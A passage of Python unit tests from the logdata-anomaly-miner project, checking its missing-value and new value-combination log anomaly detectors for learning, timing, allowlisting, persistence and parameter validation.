DummyFixedDataModelElement("service1", b"service1") service2 = DummyFixedDataModelElement("service2", b"service2") seq11 = DummySequenceModelElement("seq11", [host1, service1]) seq12 = DummySequenceModelElement("seq12", [host1, service2]) seq21 = DummySequenceModelElement("seq21", [host2, service1]) seq22 = DummySequenceModelElement("seq22", [host2, service2]) first = DummyFirstMatchModelElement("first", [seq11, seq12, seq21, seq22]) mmpvd11 = MissingMatchPathValueDetector(self.aminer_config, [ "match/first/seq11", "match/first/seq11/host1", 
"match/first/seq11/service1"], [self.stream_printer_event_handler], "Default11", True, 480, 480) self.analysis_context.register_component(mmpvd11, description+"11") missing_match_path_value_detector12 = MissingMatchPathValueDetector(self.aminer_config, [ "match/first/seq12", "match/first/seq12/host1", "match/first/seq12/service2"], [self.stream_printer_event_handler], "Default23", True, 480, 480) self.analysis_context.register_component(missing_match_path_value_detector12, description+"12") missing_match_path_value_detector21 = MissingMatchPathValueDetector(self.aminer_config, [ "match/first/seq21", "match/first/seq21/host2", "match/first/seq21/service1"], [self.stream_printer_event_handler], "Default21", True, 480, 480) self.analysis_context.register_component(missing_match_path_value_detector21, description+"21") missing_match_path_value_detector22 = MissingMatchPathValueDetector(self.aminer_config, [ "match/first/seq22", "match/first/seq22/host2", "match/first/seq22/service2"], [self.stream_printer_event_handler], "Default22", True, 480, 480) self.analysis_context.register_component(missing_match_path_value_detector22, description+"22") t = 0 for line in data: split_line = line.rsplit(b" ", 2) date = datetime.strptime(split_line[0].decode(), "%Y-%m-%d %H:%M:%S") date = date.astimezone(timezone.utc) t = (date - datetime(1970, 1, 1, tzinfo=timezone.utc)).total_seconds() # initialize the detectors and remove the first output. 
if mmpvd11.learn_mode is True: line = b"host1 service1host1 service2host2 service1host2 service2" match_context = DummyMatchContext(line) match_element = first.get_match_element("match", match_context) log_atom = LogAtom(line, ParserMatch(match_element), t, mmpvd11) mmpvd11.receive_atom(log_atom) mmpvd11.learn_mode = False match_element = first.get_match_element("match", match_context) log_atom = LogAtom(line, ParserMatch(match_element), t, missing_match_path_value_detector12) missing_match_path_value_detector12.receive_atom(log_atom) missing_match_path_value_detector12.learn_mode = False match_element = first.get_match_element("match", match_context) log_atom = LogAtom(line, ParserMatch(match_element), t, missing_match_path_value_detector21) missing_match_path_value_detector21.receive_atom(log_atom) missing_match_path_value_detector21.learn_mode = False match_element = first.get_match_element("match", match_context) log_atom = LogAtom(line, ParserMatch(match_element), t, missing_match_path_value_detector22) missing_match_path_value_detector22.receive_atom(log_atom) missing_match_path_value_detector22.learn_mode = False self.reset_output_stream() line = split_line[1] + b" " + split_line[2] match_context = DummyMatchContext(line) match_element = first.get_match_element("match", match_context) log_atom = LogAtom(line, ParserMatch(match_element), t, mmpvd11) res = mmpvd11.receive_atom(log_atom) if match_element.get_path() == "match/first/seq11": self.assertTrue(res) res = missing_match_path_value_detector12.receive_atom(log_atom) if match_element.get_path() == "match/first/seq12": self.assertTrue(res) res = missing_match_path_value_detector21.receive_atom(log_atom) if match_element.get_path() == "match/first/seq21": self.assertTrue(res) res = missing_match_path_value_detector22.receive_atom(log_atom) if match_element.get_path() == "match/first/seq22": self.assertTrue(res) # need to produce a valid match to trigger missing match paths. 
line = b"host1 service1host1 service2host2 service1host2 service2"
match_context = DummyMatchContext(line)
match_element = first.get_match_element("match", match_context)
log_atom = LogAtom(line, ParserMatch(match_element), t, mmpvd11)
mmpvd11.receive_atom(log_atom)
match_element = first.get_match_element("match", match_context)
log_atom = LogAtom(line, ParserMatch(match_element), t, missing_match_path_value_detector12)
missing_match_path_value_detector12.receive_atom(log_atom)
match_element = first.get_match_element("match", match_context)
log_atom = LogAtom(line, ParserMatch(match_element), t, missing_match_path_value_detector21)
missing_match_path_value_detector21.receive_atom(log_atom)
match_element = first.get_match_element("match", match_context)
log_atom = LogAtom(line, ParserMatch(match_element), t, missing_match_path_value_detector22)
missing_match_path_value_detector22.receive_atom(log_atom)
# exactly one overdue should be found
# NOTE(review): inner whitespace of the literals in this file is reproduced as displayed; the page rendering may
# have collapsed runs of spaces - verify the expected strings against the original file before relying on them.
msg = "2021-03-12 21:30:51 Interval too large between values\nMissingMatchPathValueDetector: \"Test3MissingMatchPathValue" \
      "Detector11\" (1 lines)\n ['match/first/seq11', 'match/first/seq11/host1', 'match/first/seq11/service1']: \"['host1 " \
      "service1', 'host1 ', 'service1']\" overdue 12s (interval 480)\n\n"
self.assertEqual(msg, self.output_stream.getvalue())


def test4do_timer(self):
    """
    Check the persistence scheduling returned by do_timer for both detector variants.

    With next_persist_time set 400 s ahead, do_timer reports the remaining seconds (200 at +200), persists and
    reschedules once the deadline is reached (returning DEFAULT_PERSISTENCE_PERIOD at +400). The asserted values at
    +999 (1 s left) and +1000 (persist again) imply that the rescheduled deadline lies DEFAULT_PERSISTENCE_PERIOD
    after the previous one.
    """
    def check_schedule(detector):
        now = time.time()
        detector.next_persist_time = now + 400
        self.assertEqual(detector.do_timer(now + 200), 200)
        self.assertEqual(detector.do_timer(now + 400), DEFAULT_PERSISTENCE_PERIOD)
        self.assertEqual(detector.do_timer(now + 999), 1)
        self.assertEqual(detector.do_timer(now + 1000), DEFAULT_PERSISTENCE_PERIOD)

    mmpvd = MissingMatchPathValueDetector(self.aminer_config, ["path"], [self.stream_printer_event_handler])
    check_schedule(mmpvd)
    mmplvd = MissingMatchPathListValueDetector(self.aminer_config, ["path"], [self.stream_printer_event_handler])
    check_schedule(mmplvd)


def test5allowlist_event(self):
    """
    Check allowlist_event: an event of another detector class is refused, and allowlisted (value, path) pairs are
    recorded in expected_values_dict with the requested interval (a negative interval falls back to 3600).
    """
    mmpvd = MissingMatchPathValueDetector(self.aminer_config, ["match/s1"], [self.stream_printer_event_handler], learn_mode=True)
    data = b" pid="
    t = time.time()
    match_context = DummyMatchContext(data)
    analysis = "Analysis.%s"
    fdme = DummyFixedDataModelElement("s1", data)
    match_element = fdme.get_match_element("match", match_context)
    mmpvd.receive_atom(LogAtom(fdme.data, ParserMatch(match_element), t, mmpvd))
    own_event = analysis % mmpvd.__class__.__name__

    # An event type belonging to another detector class must be refused.
    # NOTE(review): assertRaises(Exception, ...) also passes on an incidental TypeError/AttributeError from a wrong
    # call; pinning the exact exception type raised for a foreign event_type would make this check meaningful.
    self.assertRaises(Exception, mmpvd.allowlist_event, analysis % "NewMatchPathValueDetector", self.output_stream.getvalue(), None)

    # Successful allowlisting: expected_values_dict grows by one entry per call and the call is echoed back.
    expected = {"[' pid=']": [t, 3600, 0, "['match/s1']"]}
    self.assertEqual(mmpvd.allowlist_event(own_event, ("data", "match/s1"), 10), "Updated 'data' in 'match/s1' to new interval 10.")
    expected["data"] = [t, 10, 0, "match/s1"]
    self.assertEqual(mmpvd.expected_values_dict, expected)
    # A negative interval is replaced by the default interval (3600).
    self.assertEqual(mmpvd.allowlist_event(own_event, ("data1", "match/s1"), -1), "Updated 'data1' in 'match/s1' to new interval 3600.")
    expected["data1"] = [t, 3600, 0, "match/s1"]
    self.assertEqual(mmpvd.expected_values_dict, expected)
    # Allowlisting still writes into the baseline with learn_mode off, and for a path ("match/s2") that is not in
    # the detector's target_path_list: the allowlist channel is a privileged write into the learned state and
    # must only be reachable by trusted operators.
    mmpvd.learn_mode = False
    self.assertEqual(mmpvd.allowlist_event(own_event, ("data3", "match/s2"), 10), "Updated 'data3' in 'match/s2' to new interval 10.")
    expected["data3"] = [t, 10, 0, "match/s2"]
    self.assertEqual(mmpvd.expected_values_dict, expected)


def test6persistence(self):
    """
    Round-trip the learned state through do_persist and load_persistence_data.

    MissingMatchPathValueDetector and MissingMatchPathListValueDetector share these methods, so both are exercised.
    The on-disk format asserted below is type-tagged JSON ("string:" prefixes on keys and path strings); pinning it
    exactly catches format drift that would otherwise silently invalidate previously learned baselines.
    """
    data = b" pid="
    t = time.time()
    ts = round(t)  # atom timestamps are persisted as integers; same value as int(round(t, 0))
    passed_time = 4000  # 400 s beyond the default 3600 s interval -> exactly one "overdue 400s" report
    match_context = DummyMatchContext(data + b"22")
    fdme = DummyFixedDataModelElement("s1", data)
    fdme2 = DummyFixedDataModelElement("s2", b"22")
    match_element = fdme.get_match_element("match", match_context)
    match_element2 = fdme2.get_match_element("match", match_context)

    def persisted(detector):
        # Raw text of the detector's persistence file.
        with open(detector.persistence_file_name, "r") as f:
            return f.read()

    def expect_overdue(detector_class, atom, detail):
        # One overdue report, timestamped with the triggering atom's time.
        stamp = datetime.fromtimestamp(atom.atom_time).strftime(self.datetime_format_string)
        self.assertEqual(self.output_stream.getvalue(), self.expected_string % (stamp, detector_class.__name__, 1, detail))

    # combine_values=True (default): value list and path list are stored as their str() representations.
    mmpvd = MissingMatchPathValueDetector(self.aminer_config, ["match/s1"], [self.stream_printer_event_handler], learn_mode=True)
    self.assertTrue(mmpvd.receive_atom(LogAtom(fdme.data, ParserMatch(match_element), ts, mmpvd)))
    mmpvd.do_persist()
    self.assertEqual(persisted(mmpvd), f"""{{"string:[' pid=']": [{ts}, {mmpvd.default_interval}, 0, "string:['match/s1']"]}}""")
    mmpvd.expected_values_dict = {}
    mmpvd.load_persistence_data()
    self.assertEqual(mmpvd.expected_values_dict, {"[' pid=']": [ts, mmpvd.default_interval, 0, "['match/s1']"]})
    # A fresh detector with the same (default) persistence_id evidently starts from the persisted state: its very
    # first atom, 4000 s later, is already reported as 400 s overdue.
    other_mmpvd = MissingMatchPathValueDetector(self.aminer_config, ["match/s1"], [self.stream_printer_event_handler], learn_mode=True)
    log_atom = LogAtom(fdme.data, ParserMatch(match_element), ts + passed_time, other_mmpvd)
    self.assertTrue(other_mmpvd.receive_atom(log_atom))
    expect_overdue(MissingMatchPathValueDetector, log_atom, "['match/s1']: \"[' pid=']\" overdue 400s (interval 3600)")
    self.reset_output_stream()

    # combine_values=False: plain value and path strings are persisted.
    mmpvd = MissingMatchPathValueDetector(self.aminer_config, ["match/s1"], [self.stream_printer_event_handler], learn_mode=True, combine_values=False)
    self.assertTrue(mmpvd.receive_atom(LogAtom(fdme.data, ParserMatch(match_element), ts, mmpvd)))
    mmpvd.do_persist()
    self.assertEqual(persisted(mmpvd), f"""{{"string: pid=": [{ts}, {mmpvd.default_interval}, 0, "string:match/s1"]}}""")
    mmpvd.expected_values_dict = {}
    mmpvd.load_persistence_data()
    self.assertEqual(mmpvd.expected_values_dict, {" pid=": [ts, mmpvd.default_interval, 0, "match/s1"]})
    # NOTE(review): this second detector is built with the default combine_values=True, so it learns the combined
    # key on its first atom and the asserted output reports only that key; the uncombined entry loaded from disk
    # is not expected in the report.
    other_mmpvd = MissingMatchPathValueDetector(self.aminer_config, ["match/s1"], [self.stream_printer_event_handler], learn_mode=True)
    self.assertTrue(other_mmpvd.receive_atom(LogAtom(fdme.data, ParserMatch(match_element), ts, other_mmpvd)))
    log_atom = LogAtom(fdme.data, ParserMatch(match_element), ts + passed_time, other_mmpvd)
    self.assertTrue(other_mmpvd.receive_atom(log_atom))
    expect_overdue(MissingMatchPathValueDetector, log_atom, "['match/s1']: \"[' pid=']\" overdue 400s (interval 3600)")
    self.reset_output_stream()

    # MissingMatchPathListValueDetector: one entry per value, each recorded under its own path.
    mmplvd = MissingMatchPathListValueDetector(self.aminer_config, ["match/s1", "match/s2"], [self.stream_printer_event_handler], learn_mode=True)
    # NOTE(review): these two atoms name mmpvd, not mmplvd, as their source (kept unchanged; looks like a copy-paste
    # slip - confirm the source argument is not consulted by the detector before tidying it).
    log_atom = LogAtom(fdme.data, ParserMatch(match_element), ts, mmpvd)
    log_atom2 = LogAtom(fdme2.data, ParserMatch(match_element2), ts, mmpvd)
    self.assertTrue(mmplvd.receive_atom(log_atom2))
    self.assertTrue(mmplvd.receive_atom(log_atom))
    mmplvd.do_persist()
    self.assertEqual(persisted(mmplvd), f"""{{"string:22": [{ts}, {mmplvd.default_interval}, 0, "string:match/s2"], "string: pid=": [{ts}, {mmplvd.default_interval}, 0, "string:match/s1"]}}""")
    mmplvd.expected_values_dict = {}
    mmplvd.load_persistence_data()
    self.assertEqual(mmplvd.expected_values_dict, {" pid=": [ts, mmplvd.default_interval, 0, "match/s1"], "22": [ts, mmplvd.default_interval, 0, "match/s2"]})
    other_mmplvd = MissingMatchPathListValueDetector(self.aminer_config, ["match/s1", "match/s2"], [self.stream_printer_event_handler], learn_mode=True)
    self.assertTrue(other_mmplvd.receive_atom(LogAtom(fdme.data, ParserMatch(match_element), ts, other_mmplvd)))
    log_atom = LogAtom(fdme.data, ParserMatch(match_element), ts + passed_time, other_mmplvd)
    self.assertTrue(other_mmplvd.receive_atom(log_atom))
    expect_overdue(MissingMatchPathListValueDetector, log_atom, "match/s1, match/s2: '22' overdue 400s (interval 3600)\n match/s1, match/s2: ' pid=' overdue 400s (interval 3600)")


def test7validate_parameters(self):
    """
    Constructor argument validation. MissingMatchPathValueDetector and MissingMatchPathListValueDetector share the
    same constructor, so only the former is driven here. Wrong types raise TypeError, wrong values ValueError, and
    the accepted spellings construct without error.
    """
    cfg = self.aminer_config
    not_a_bool = (None, b"True", "True", 123, 123.22, {"id": "Default"}, ["Default"], [], (), set())
    not_a_number = (b"Default", "123", {"id": "Default"}, ["Default"], [], (), set())

    def handlers():
        # A fresh handler list per construction, as in the original assertions.
        return [self.stream_printer_event_handler]

    def rejects(exc, *args, **kwargs):
        self.assertRaises(exc, MissingMatchPathValueDetector, cfg, *args, **kwargs)

    def check_positive_number(param):
        # Intervals and stop-learning times must be positive int/float; learn_mode=True accompanies them as in
        # the original assertions.
        for bad in (-1, 0):
            rejects(ValueError, ["path"], handlers(), learn_mode=True, **{param: bad})
        for bad in not_a_number:
            rejects(TypeError, ["path"], handlers(), learn_mode=True, **{param: bad})
        MissingMatchPathValueDetector(cfg, ["path"], handlers(), learn_mode=True, **{param: 100})
        MissingMatchPathValueDetector(cfg, ["path"], handlers(), learn_mode=True, **{param: 100.22})

    def check_bool(param):
        for bad in not_a_bool:
            rejects(TypeError, ["path"], handlers(), **{param: bad})
        MissingMatchPathValueDetector(cfg, ["path"], handlers(), **{param: True})

    # target_path_list: a list of non-empty strings; None and [""] are value errors, other types are type errors.
    rejects(TypeError, "default", handlers())
    rejects(ValueError, None, handlers())
    rejects(ValueError, [""], handlers())
    for bad in (b"Default", True, 123, 123.3, {"id": "Default"}, (), set()):
        rejects(TypeError, bad, handlers())
    # anomaly_event_handlers: a list of handler objects.
    for bad in (["default"], None, "", b"Default", True, 123, 123.3, {"id": "Default"}, (), set()):
        rejects(TypeError, ["path"], bad)
    # persistence_id: a non-empty string.
    rejects(ValueError, ["path"], handlers(), persistence_id="")
    for bad in (None, b"Default", True, 123, 123.22, {"id": "Default"}, ["Default"], [], (), set()):
        rejects(TypeError, ["path"], handlers(), persistence_id=bad)
    MissingMatchPathValueDetector(cfg, ["path"], handlers(), persistence_id="Default")
    # learn_mode: a bool (None is not among the original assertions for this parameter).
    for bad in not_a_bool[1:]:
        rejects(TypeError, ["path"], handlers(), learn_mode=bad)
    MissingMatchPathValueDetector(cfg, ["path"], handlers(), learn_mode=True)
    check_positive_number("default_interval")
    check_positive_number("realert_interval")
    check_bool("combine_values")
    check_bool("output_logline")
    check_positive_number("stop_learning_time")
    check_positive_number("stop_learning_no_anomaly_time")
    # Setting both stop-learning conditions at once is rejected.
    rejects(ValueError, ["path"], handlers(), learn_mode=True, stop_learning_time=100, stop_learning_no_anomaly_time=100)
    # log_resource_ignore_list: a list of resource URLs - a bare filesystem path is a value error, a file:// URL is accepted.
    rejects(ValueError, ["path"], handlers(), log_resource_ignore_list=["/tmp/syslog"])
    for bad in ("", b"Default", True, 123, 123.22, {"id": "Default"}, (), set()):
        rejects(TypeError, ["path"], handlers(), log_resource_ignore_list=bad)
    MissingMatchPathValueDetector(cfg, ["path"], handlers(), log_resource_ignore_list=["file:///tmp/syslog"])


if __name__ == "__main__":
    unittest.main()


# --- archive member boundary (tar header residue from the source archive, not Python source):
# logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/analysis/NewMatchIdValueComboDetectorTest.py000066400000000000000000000716411500476301700324600ustar00rootroot00000000000000
import time
from aminer.analysis.NewMatchIdValueComboDetector import NewMatchIdValueComboDetector
from aminer.input.LogAtom import LogAtom
from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement
from aminer.parsing.SequenceModelElement import SequenceModelElement
from aminer.parsing.FixedDataModelElement import FixedDataModelElement
from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement
from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement
from aminer.parsing.FixedWordlistDataModelElement import FixedWordlistDataModelElement
from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement
from aminer.parsing.MatchContext import MatchContext
from aminer.parsing.ParserMatch import ParserMatch
from unit.TestBase import TestBase, DummyMatchContext, DummyFixedDataModelElement, DummySequenceModelElement
from aminer.AminerConfig \
import DEFAULT_PERSISTENCE_PERIOD
from datetime import datetime


class NewMatchIdValueComboDetectorTest(TestBase):
    """Unittests for the NewMatchIdValueComboDetector."""

    # Shared fixtures. The second DummyMatchContext is presumably consumed sequentially: seq2 matches
    # "ddd 25538" and seq3 the following "ddd 25539" of the same b"ddd 25538ddd 25539" buffer.
    match_context = DummyMatchContext(b" pid=25537 uid=2")
    fdme1 = DummyFixedDataModelElement("s1", b" pid=")
    fdme2 = DummyFixedDataModelElement("d1", b"25537")
    seq1 = DummySequenceModelElement("seq", [fdme1, fdme2])
    match_element1 = seq1.get_match_element("", match_context)
    match_context = DummyMatchContext(b"ddd 25538ddd 25539")
    fdme3 = DummyFixedDataModelElement("s1", b"ddd ")
    fdme4 = DummyFixedDataModelElement("d1", b"25538")
    fdme5 = DummyFixedDataModelElement("d1", b"25539")
    seq2 = DummySequenceModelElement("seq", [fdme3, fdme4])
    match_element2 = seq2.get_match_element("", match_context)
    seq3 = DummySequenceModelElement("seq", [fdme3, fdme5])
    match_element3 = seq3.get_match_element("", match_context)

    def test1receive_atom(self):
        """
        Check receive_atom: a new value combination is reported once and learned while learn_mode=True, and reported
        on every occurrence (never learned) once learn_mode=False. Also covers allow_missing_values_flag,
        stop_learning_time and stop_learning_no_anomaly_time.
        """
        # NOTE(review): whitespace inside this template is reproduced as displayed; the page rendering may have
        # collapsed runs of spaces - verify against the original file.
        expected_string = '%s New value combination(s) detected\n%s: "None" (%d lines)\n %s\n\n'
        datetime_format_string = "%Y-%m-%d %H:%M:%S"
        t = round(time.time(), 3)

        def build(**kwargs):
            # Detector over /seq/s1 and /seq/d1 with /seq/d1 as id path, learning and without logline output.
            return NewMatchIdValueComboDetector(self.aminer_config, ["/seq/s1", "/seq/d1"], [self.stream_printer_event_handler], ["/seq/d1"], 120, learn_mode=True, output_logline=False, **kwargs)

        def expect_report(detector, detail):
            # Exactly one "new combination" report for `detail`, timestamped with t.
            stamp = datetime.fromtimestamp(t).strftime(datetime_format_string)
            self.assertEqual(self.output_stream.getvalue(), expected_string % (stamp, detector.__class__.__name__, 1, detail))

        nmivcd = build()
        log_atom1 = LogAtom(self.match_element1.match_string, ParserMatch(self.match_element1), t, nmivcd)
        log_atom2 = LogAtom(self.match_element2.match_string, ParserMatch(self.match_element2), t, nmivcd)
        log_atom3 = LogAtom(self.match_element3.match_string, ParserMatch(self.match_element3), t, nmivcd)
        # learn_mode=True: reported once, then known.
        self.assertTrue(nmivcd.receive_atom(log_atom1))
        expect_report(nmivcd, "{'/seq/s1': ' pid=', '/seq/d1': '25537'}")
        self.reset_output_stream()
        self.assertTrue(nmivcd.receive_atom(log_atom1))
        self.assertEqual(self.output_stream.getvalue(), "")
        self.reset_output_stream()
        # learn_mode=False: an unknown combination is reported every time because it is no longer learned.
        nmivcd.learn_mode = False
        for _ in range(2):
            self.assertTrue(nmivcd.receive_atom(log_atom2))
            expect_report(nmivcd, "{'/seq/s1': 'ddd ', '/seq/d1': '25538'}")
            self.reset_output_stream()
        # allow_missing_values_flag=True
        nmivcd.allow_missing_values_flag = True
        self.assertTrue(nmivcd.receive_atom(log_atom3))
        expect_report(nmivcd, "{'/seq/s1': 'ddd ', '/seq/d1': '25539'}")

        # stop_learning_time: judging by the asserted times, learning ends once an atom arrives more than 100 s
        # after the first one (still learning at +99, stopped at +101).
        nmivcd = build(stop_learning_time=100)
        self.assertTrue(nmivcd.receive_atom(log_atom1))
        log_atom1.atom_time = t + 99
        self.assertTrue(nmivcd.receive_atom(log_atom1))
        self.assertTrue(nmivcd.learn_mode)
        log_atom1.atom_time = t + 101
        self.assertTrue(nmivcd.receive_atom(log_atom1))
        self.assertFalse(nmivcd.learn_mode)

        # stop_learning_no_anomaly_time: the asserted sequence shows the 100 s window restarting when a new
        # combination (log_atom2 at t+100) is seen - learning is still on at t+200 and ends at t+201. A steady
        # trickle of novel combinations therefore keeps learn mode open indefinitely; stop_learning_time is the
        # only hard bound on the learning (and baseline-poisoning) window.
        nmivcd = build(stop_learning_no_anomaly_time=100)
        log_atom1.atom_time = t
        self.assertTrue(nmivcd.receive_atom(log_atom1))
        log_atom1.atom_time = t + 100
        self.assertTrue(nmivcd.receive_atom(log_atom1))
        self.assertTrue(nmivcd.learn_mode)
        log_atom2.atom_time = t + 100
        self.assertTrue(nmivcd.receive_atom(log_atom2))
        self.assertTrue(nmivcd.learn_mode)
        log_atom1.atom_time = t + 200
        self.assertTrue(nmivcd.receive_atom(log_atom1))
        self.assertTrue(nmivcd.learn_mode)
        log_atom1.atom_time = t + 201
        self.assertTrue(nmivcd.receive_atom(log_atom1))
        self.assertFalse(nmivcd.learn_mode)

    def test2do_timer(self):
        """
        Check do_timer's persistence scheduling: the seconds remaining until next_persist_time, then
        DEFAULT_PERSISTENCE_PERIOD each time the deadline is reached (the +999/+1000 values imply the next deadline
        is set DEFAULT_PERSISTENCE_PERIOD after the previous one).
        """
        nmivcd = NewMatchIdValueComboDetector(self.aminer_config, ["path"], [self.stream_printer_event_handler], ["path/id"], 120, learn_mode=True, output_logline=False)
        now = time.time()
        nmivcd.next_persist_time = now + 400
        for offset, remaining in ((200, 200), (400, DEFAULT_PERSISTENCE_PERIOD), (999, 1), (1000, DEFAULT_PERSISTENCE_PERIOD)):
            self.assertEqual(nmivcd.do_timer(now + offset), remaining)

    def test3allowlist_event(self):
        """
        Check allowlist_event: foreign event types and unsupported allowlisting data are refused, a complete
        path->value combination is appended to known_values, and a None value is only accepted once
        allow_missing_values_flag is set.
        """
        nmivcd = NewMatchIdValueComboDetector(self.aminer_config, ["/seq/s1", "/seq/d1"], [self.stream_printer_event_handler], ["/seq/d1"], 100, learn_mode=True, output_logline=False)
        t = round(time.time(), 3)
        analysis = "Analysis.%s"
        value = "value"
        value2 = "2"
        own_event = analysis % nmivcd.__class__.__name__
        nmivcd.receive_atom(LogAtom(self.match_element1.match_string, ParserMatch(self.match_element1), t, nmivcd))
        # NOTE(review): both checks below use assertRaises(Exception, ...), which also passes on an incidental
        # TypeError/AttributeError from a wrong call; pin the exact exception types to make them meaningful.
        self.assertRaises(Exception, nmivcd.allowlist_event, analysis % "NewMatchPathDetector", self.output_stream.getvalue(), None)
        # Per the original test's comment, NewMatchIdValueComboDetector does not support allowlisting_data
        # (["random", "Data"] here). Note the event_data passed is a plain string too, so which argument triggers
        # the exception is not pinned down by this call.
        self.assertRaises(Exception, nmivcd.allowlist_event, own_event, self.output_stream.getvalue(), ["random", "Data"])
        # A complete combination is appended to known_values and echoed in the return message.
        self.assertEqual(nmivcd.allowlist_event(own_event, {"/seq/s1": value, "/seq/d1": value2}, None),
                         "Allowlisted path(s) %s with %s." % ("/seq/s1, /seq/d1", {"/seq/s1": value, "/seq/d1": value2}))
        self.assertEqual(nmivcd.known_values, [{"/seq/s1": " pid=", "/seq/d1": "25537"}, {"/seq/s1": value, "/seq/d1": value2}])
        # Without allow_missing_values_flag: a None value, a missing path and an unknown path are all rejected.
        for incomplete in ({"/seq/s1": None, "/seq/d1": value2}, {"/seq/d1": value2}, {"/seq/s2": value, "/seq/d1": value2}):
            self.assertRaises(TypeError, nmivcd.allowlist_event, own_event, incomplete, None)
        # With allow_missing_values_flag a None value is accepted and stored as such.
        nmivcd.allow_missing_values_flag = True
        self.assertEqual(nmivcd.allowlist_event(own_event, {"/seq/s1": None, "/seq/d1": value2}, None),
                         "Allowlisted path(s) %s with %s." % ("/seq/s1, /seq/d1", {"/seq/s1": None, "/seq/d1": value2}))
        self.assertEqual(nmivcd.known_values, [{"/seq/s1": " pid=", "/seq/d1": "25537"}, {"/seq/s1": value, "/seq/d1": value2}, {"/seq/s1": None, "/seq/d1": value2}])

    def test4persistence(self):
        """
        Round-trip known_values through do_persist and load_persistence_data, and check that a second detector using
        the same (default) persistence_id starts from the persisted combinations.
        """
        nmivcd = NewMatchIdValueComboDetector(self.aminer_config, ["/seq/s1", "/seq/d1"], [self.stream_printer_event_handler], ["/seq/d1"], 100, learn_mode=True, output_logline=False)
        t = round(time.time(), 3)
        learned = [{"/seq/d1": "25537", "/seq/s1": " pid="}, {"/seq/d1": "25538", "/seq/s1": "ddd "}]
        log_atom1 = LogAtom(self.match_element1.match_string, ParserMatch(self.match_element1), t, nmivcd)
        log_atom2 = LogAtom(self.match_element2.match_string, ParserMatch(self.match_element2), t, nmivcd)
        self.assertTrue(nmivcd.receive_atom(log_atom1))
        self.assertTrue(nmivcd.receive_atom(log_atom2))
        self.assertEqual(nmivcd.known_values, learned)
        nmivcd.do_persist()
        # Type-tagged JSON on disk ("string:" prefixes); pinning the exact text catches format drift that would
        # silently invalidate previously learned baselines.
        # NOTE(review): only the happy path is covered - loading a tampered or malformed persistence file is not exercised.
        with open(nmivcd.persistence_file_name, "r") as f:
            self.assertEqual(f.read(), '[{"string:/seq/s1": "string: pid=", "string:/seq/d1": "string:25537"}, {"string:/seq/s1": "string:ddd ", "string:/seq/d1": "string:25538"}]')
        nmivcd.known_values = []
        nmivcd.load_persistence_data()
        self.assertEqual(nmivcd.known_values, learned)
        # A new detector with the default persistence_id evidently picks the persisted combinations up at construction.
        other = NewMatchIdValueComboDetector(self.aminer_config, [self.match_element1.path, self.match_element2.path], [self.stream_printer_event_handler], ["/seq/s1/id", "/seq/d1/id"], 100)
        self.assertEqual(nmivcd.known_values, other.known_values)

    def test5validate_parameters(self):
        """
        Test all initialization parameters for the detector.
        Input parameters must be validated in the class.
        """
        ids = ["path/id"]
        self.assertRaises(ValueError, NewMatchIdValueComboDetector, self.aminer_config, [""], [self.stream_printer_event_handler], ids, 1)
        self.assertRaises(ValueError, NewMatchIdValueComboDetector, self.aminer_config, [], [self.stream_printer_event_handler], ids, 1)
        self.assertRaises(ValueError, NewMatchIdValueComboDetector, self.aminer_config, None, [self.stream_printer_event_handler], 
ids, 1)
        self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, "", [self.stream_printer_event_handler], ids, 1)
        self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, b"Default", [self.stream_printer_event_handler], ids, 1)
        self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, True, [self.stream_printer_event_handler], ids, 1)
        self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, 123, [self.stream_printer_event_handler], ids, 1)
        self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, 123.3, [self.stream_printer_event_handler], ids, 1)
        self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, {"id": "Default"}, [self.stream_printer_event_handler], ids, 1)
        self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, (), [self.stream_printer_event_handler], ids, 1)
        self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, set(), [self.stream_printer_event_handler], ids, 1)
        self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], ["default"], ids, 1)
        self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], None, ids, 1)
        self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], "", ids, 1)
        self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], b"Default", ids, 1)
        self.assertRaises(TypeError, NewMatchIdValueComboDetector,
self.aminer_config, ["path"], True, ids, 1) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], 123, ids, 1) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], 123.3, ids, 1) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], {"id": "Default"}, ids, 1) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], (), ids, 1) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], set(), ids, 1) self.assertRaises(ValueError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], [""], 1) self.assertRaises(ValueError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], [], 1) self.assertRaises(ValueError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], None, 1) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], "", 1) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], b"Default", 1) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], True, 1) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], 123, 1) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], 123.3, 1) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], 